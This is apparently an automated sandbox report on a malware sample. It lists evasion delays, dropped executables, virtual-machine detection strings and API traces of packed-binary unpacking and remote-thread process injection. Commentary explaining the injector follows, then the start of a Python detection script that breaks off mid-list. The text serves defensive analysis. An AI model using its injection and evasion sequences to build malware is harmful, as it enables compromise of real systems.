        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE12392
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE11328
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 180000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 300000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 360000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 1800000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 600000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 900000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Window / User API: threadDelayed 4899
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Window / User API: threadDelayed 3039
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 868
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 869
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9997
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Window / User API: threadDelayed 9998
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rkuso.exe
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\odnhm.exe
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Dropped PE file which has not been started: C:\clmaq.pif
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7348 Thread sleep time: -2508288s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7372 Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7380 Thread sleep time: -180000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7384 Thread sleep time: -61107s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7400 Thread sleep time: -300000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7388 Thread sleep time: -100000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7512 Thread sleep time: -2040000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7512 Thread sleep time: -91000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7380 Thread sleep time: -840000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7516 Thread sleep time: -1940000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7516 Thread sleep time: -3960000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7380 Thread sleep time: -10800000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7384 Thread sleep time: -600000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7376 Thread sleep time: -900000s >= -30000s
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7348 Thread sleep time: -1555968s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7864 Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7864 Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7860 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7884 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7248 Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7872 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7244 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7964 Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7964 Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7948 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 4416 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7960 Thread sleep count: 9997 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7960 Thread sleep time: -99970000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7876 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 8004 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 3272 Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 3272 Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 4928 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 6048 Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 6048 Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7724 Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7724 Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 1004 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 5552 Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 5552 Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7700 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7696 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Code function: 0_2_008FA2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread, 0_2_008FA2F5
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Code function: 0_2_00901060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep, 0_2_00901060
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 120000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 180000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 61107
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 300000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 120000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 360000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 1800000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 600000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread delayed: delay time: 900000
        Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user
        Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
        Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData
        Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local
        Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft
        Source: explorer.exe, 0000000D.00000000.1887146346.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: SearchApp.exe, 00000013.00000000.1962289906.0000024340FB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
        Source: SearchApp.exe, 00000013.00000000.2110545083.0000024B59D34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: /rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: SearchApp.exe, 00000013.00000000.1990602343.0000024B43440000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: hyper-v
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wes
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000043E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1863871375.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: SearchApp.exe, 00000013.00000000.2033767665.0000024B54FD2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 00000013.00000000.1963746706.00000243411CA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955650255.0000024339C3F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2081086933.0000024B56C20000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2136705344.0000024B5A7FA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2119297571.0000024B59F10000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1959774579.00000243400AB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1984144267.0000024B425C1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 00000013.00000000.2055424772.0000024B55920000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
        Source: dwm.exe, 00000005.00000000.1720224173.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
        Source: explorer.exe, 0000000D.00000003.3107470432.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: SearchApp.exe, 00000013.00000000.2096567068.0000024B5866C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2119822753.0000024B59F87000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1988601679.0000024B42D43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"892FA07886414BDF8EE1764A59FF39C6","ConversationId":"21139c92-d559-45ad-9d8f-73e2a64bf7e7","LogicalId":"30363daf-0e99-4b56-afae-f0c5eee8522a","tid":"651d53d035ec4c7eba14a4092e8aedb0","sid":"193A581F83766B4319784BBF829B6A16","uid":"","muid":"6666694284484FA1B35CCB433D42E997","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651d53d035ec4c7eba14a4092e8aedb0 Ref B: MWHEEEAP0024F6D Ref C: 
2023-10-04T12:00:16Z","vs":{"BAW12":"BFBBCEJIT2","BAW2":"BFBSPRC","BAW5":"PREMSBCUSTVERT","BAW7":"BFBPROWSBINITCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBBCEJIT":"1","FEATURE.BFBBCEJIT2":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBREFRPLAN":"1","FEATURE.BFBSPRC":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSAAUTOJOIN":"1","FEATURE.MSBDSBIGLEAM":"1","FEATURE.MSBDSBORGV2":"1","FEATURE.MSBDSBORGV2CO":"1","FEATURE.MSBWDSBI920T1":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.03.39942242"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
        Source: SearchApp.exe, 00000013.00000000.1962289906.0000024340FB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wQ%
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui
        Source: SearchApp.exe, 00000013.00000000.1990602343.0000024B43440000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-vOs and f
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayershell:RecycleBinFolderVMware.Workstation.vmuiE7CF176E110C211Bcom.squirrel.atom.atom8132
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=ww
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1958382535.000002433B786000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe12004
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayer
        Source: explorer.exe, 0000000D.00000000.1885971448.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
        Source: explorer.exe, 0000000D.00000000.1887146346.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 0000000D.00000003.3107470432.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: SearchApp.exe, 00000013.00000000.2130745827.0000024B5A0EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Downloading data https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w...
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nhttps://r.bing.com/rp/KzWxoKDHqNy24XFwlA6xWw89_DA.br.jsaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: explorer.exe, 0000000D.00000000.1885971448.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: SearchApp.exe, 00000013.00000000.2111337872.0000024B59D5E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1990860553.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 00000013.00000000.2046862544.0000024B55466000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lyncvmwareonenoteneroXK
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wses
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
        Source: explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: explorer.exe, 0000000D.00000000.1885971448.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Horizon.Client
        Source: RuntimeBroker.exe, 00000012.00000000.1948731468.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Code function: 0_2_00987AC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00987AC0
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Code function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00901EF6
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process token adjusted: Debug
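The two "Code function" traces above are the part of this section worth reading closely. 0_2_00987AC0 is the entry-point stub of a packed binary: resolve imports with LoadLibraryA/GetProcAddress, then VirtualProtect three times to rewrite section permissions. 0_2_00901EF6 is the injector: it enables a privilege on its own token (the two "Process token adjusted: Debug" entries identify it as SeDebugPrivilege; the trace itself only shows LookupPrivilegeValueA), opens the target, resolves the target's owner with GetTokenInformation/LookupAccountSidA and compares it against three names the trace does not reveal, creates a mutex, and then runs VirtualAllocEx/WriteProcessMemory/CreateRemoteThread twice. The script below is an added example, not Joe Sandbox code: it parses these trace lines and matches ordered API sub-sequences, counting how often each fires, so the double injection in 0_2_00901EF6 comes out as 2 rather than 1. The pattern table is our own assumption and deliberately small.

```python
import re

# Constructed input: the two "Code function" entries from the report section above,
# copied as they appear there (report text, not output of this script).
REPORT_LINES = [
    "Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe Code function: 0_2_00987AC0 "
    "EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,"
    "VirtualProtect,0_2_00987AC0",
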